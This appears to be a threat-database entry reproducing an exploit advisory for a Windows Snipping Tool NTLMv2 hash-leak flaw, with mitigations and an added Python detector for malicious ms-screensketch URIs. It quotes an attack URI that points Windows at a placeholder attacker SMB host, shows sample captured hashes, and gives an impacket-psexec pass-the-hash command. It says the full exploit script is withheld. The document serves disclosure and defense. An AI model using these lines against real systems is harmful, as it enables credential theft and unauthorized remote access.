Windows Snipping Tool - NTLMv2 Hash Hijack
This is an exploit targeting the Windows Snipping Tool that involves hijacking NTLMv2 hashes. The exploit code is available in text format. No specific affected versions or patch information is provided. The threat is assessed as medium severity based on available information.
AI Analysis
Technical Summary
The exploit leverages a vulnerability in the Windows Snipping Tool to hijack NTLMv2 hashes. No detailed technical information or affected versions are specified. Exploit code is publicly available in text format, but no vendor patch or official remediation guidance is provided.
Potential Impact
Potential unauthorized access or credential theft via NTLMv2 hash hijacking when using the Windows Snipping Tool. The exact impact scope is unclear due to limited details. No known exploits in the wild have been reported.
Mitigation Recommendations
Patch status is not yet confirmed — check the vendor advisory for current remediation guidance. Until official fixes or guidance are available, exercise caution when using the Windows Snipping Tool in untrusted environments.
Indicators of Compromise
- exploit-code:

# Exploit Title: Windows Snipping Tool - NTLMv2 Hash Hijack
# Date: 2026-04-22
# Exploit Author: nu11secur1ty
# Video Demo: https://www.patreon.com/posts/cve-2026-33829-156243398
# Vendor Homepage: https://www.microsoft.com
# Software Link: Built-in Windows Snipping Tool
# Version: Windows 10, Windows 11, Windows Server 2012-2025 (pre-April 2026 patch)
# Tested on: Windows 11 Pro (Build 22621) / Kali Linux 2026.1
# CVE: CVE-2026-33829
# Attack Type: Remote / Network-based
# Impact: Credential Theft (NTLMv2 Hash) / Pass-the-Hash
# CVSS Score: 4.3 (Medium) but HIGH impact in practice

## Vulnerable Systems
- Windows 10 (all versions before April 14, 2026 patch)
- Windows 11 (all versions before April 14, 2026 patch)
- Windows Server 2012, 2016, 2019, 2022, 2025 (before April 14, 2026 patch)

## Description
A vulnerability in Windows Snipping Tool (CVE-2026-33829) allows attackers to force NTLMv2 authentication to a remote SMB server via crafted ms-screensketch:edit URI. When a victim clicks a malicious link and approves the "Open Snipping Tool" prompt, Windows automatically sends the user's NTLMv2 hash to the attacker-controlled server.

This exploit extends beyond the original PoC by also harvesting HTTP NTLM hashes (via WPAD), LLMNR, and MDNS poisoning - capturing MULTIPLE valid hashes from a SINGLE click. Captured hashes can be used for Pass-the-Hash attacks or cracked with Hashcat.

## Exploit Features (nu11secur1ty edition)
- ✅ Snipping Tool NTLM hash capture (original vector)
- ✅ Automatic HTTP NTLM authentication capture (additional vector)
- ✅ WPAD poisoning (automatic proxy config)
- ✅ LLMNR/MDNS poisoning (fallback vectors)
- ✅ Multi-harvest - captures multiple hashes from one click
- ✅ One-command execution (sudo python3 exploit.py)
- ✅ Auto-detects terminal and opens Responder in new window
- ✅ Built-in HTTP server for HTML delivery

## Proof of Concept
**Video Demonstration (Patreon Exclusive):** https://www.patreon.com/posts/cve-2026-33829-156243398

1. Run exploit on attacker machine (Kali Linux):
   sudo python3 CVE-2026-33829-NTLMv2-Hash-Hijack.py
2. Victim (Windows 11) opens the malicious URL:
   http://<ATTACKER_IP>/exploit.html
3. Victim clicks the button and approves "Open Snipping Tool"
4. Attacker captures NTLMv2 hash(es):
   [HTTP] NTLMv2 Username : \Hacked
   [HTTP] NTLMv2 Hash : Hacked:::157e1f851f7c17e7:16D87BC0AD284FB6...
5. Attacker performs Pass-the-Hash to gain access:
   impacket-psexec -hashes :<HASH> Hacked@<VICTIM_IP>

## Attack Vector
ms-screensketch:edit?filePath=\\<ATTACKER_IP>\test\evil.png

## Requirements
Attacker: Kali Linux (or any Linux with Python3, impacket, responder)
Victim: Windows 10/11 with Snipping Tool (unpatched)

## Mitigations
- Apply Microsoft patch from April 14, 2026
- Block outbound SMB traffic (port 445)
- Disable NTLMv1 and restrict NTLMv2 via GPO
- Educate users not to click "Open Snipping Tool" prompts from untrusted sources

## References
- https://cybersecuritynews.com/windows-snipping-tool-vulnerability/
- https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-33829
- https://github.com/blackarrowsec/redteam-research/tree/master/CVE-2026-33829

## Exploit Code (NFO)
The exploit will not be published for security reasons!
For more information, please get in touch with me!

--
System Administrator - Infrastructure Engineer
Penetration Testing Engineer
Exploit developer at https://packetstorm.news/
https://cve.mitre.org/index.html
https://cxsecurity.com/ and https://www.exploit-db.com/
0day Exploit DataBase https://0day.today/
home page: https://www.asc3t1c-nu11secur1ty.com/
hiPEnIMR0v7QCo/+SEH9gBclAAYWGnPoBIQ75sCj60E=
nu11secur1ty <http://nu11secur1ty.com/>
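A detection sketch for the attack vector quoted in the advisory, added here as an example and not taken from the advisory or its author: it scans mail bodies, HTML or proxy logs for `ms-screensketch:` URIs whose `filePath` points at a UNC host. The function names and sample lines are constructed for illustration; treating forward-slash `//host/share` as UNC is a defensive assumption.

```python
import html
import re
from urllib.parse import unquote

# The URI scheme named in the advisory, up to whitespace or a quote.
URI_RE = re.compile(r"ms-screensketch:[^\s\"'<>]+", re.IGNORECASE)
PARAM_RE = re.compile(r"[?&]filePath=([^&]*)", re.IGNORECASE)
# UNC form \\host\share (forward slashes accepted as an assumption).
UNC_RE = re.compile(r"^[\\/]{2}([^\\/?]+)[\\/]")

# Constructed sample input (documentation-range address and .example names).
SAMPLE = [
    r'<a href="ms-screensketch:edit?filePath=\\192.0.2.10\share\a.png">view</a>',
    "GET /r?u=ms-screensketch:edit?filePath=%255C%255CFILES.example%255Cs%255Ca.png",
    r"ms-screensketch:edit?filePath=C:\Users\alice\Pictures\shot.png",
]


def fully_decode(value, max_rounds=3):
    """Undo HTML entities and nested percent-encoding, with a bounded loop."""
    for _ in range(max_rounds):
        decoded = unquote(html.unescape(value))
        if decoded == value:
            break
        value = decoded
    return value


def remote_snip_targets(text):
    """Return (uri, host) for each ms-screensketch URI whose filePath is UNC."""
    findings = []
    for match in URI_RE.finditer(text):
        uri = fully_decode(match.group(0))
        param = PARAM_RE.search(uri)
        if not param:
            continue
        unc = UNC_RE.match(param.group(1))
        if unc:  # local paths such as C:\... are not reported
            findings.append((uri, unc.group(1).lower()))
    return findings


if __name__ == "__main__":
    for uri, host in remote_snip_targets("\n".join(SAMPLE)):
        print(f"remote filePath host={host} uri={uri}")
```

Hosts reported by this check can be correlated with outbound port 445 connections, which the advisory's mitigations recommend blocking.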
Technical Details
- Edb Id: 52567
- Has Exploit Code: true
- Code Language: text
Threat ID: 6a084e9bec166c07b0dd9363
Added to database: 5/16/2026, 11:01:47 AM
Last enriched: 5/16/2026, 11:01:50 AM
Last updated: 5/17/2026, 6:35:19 AM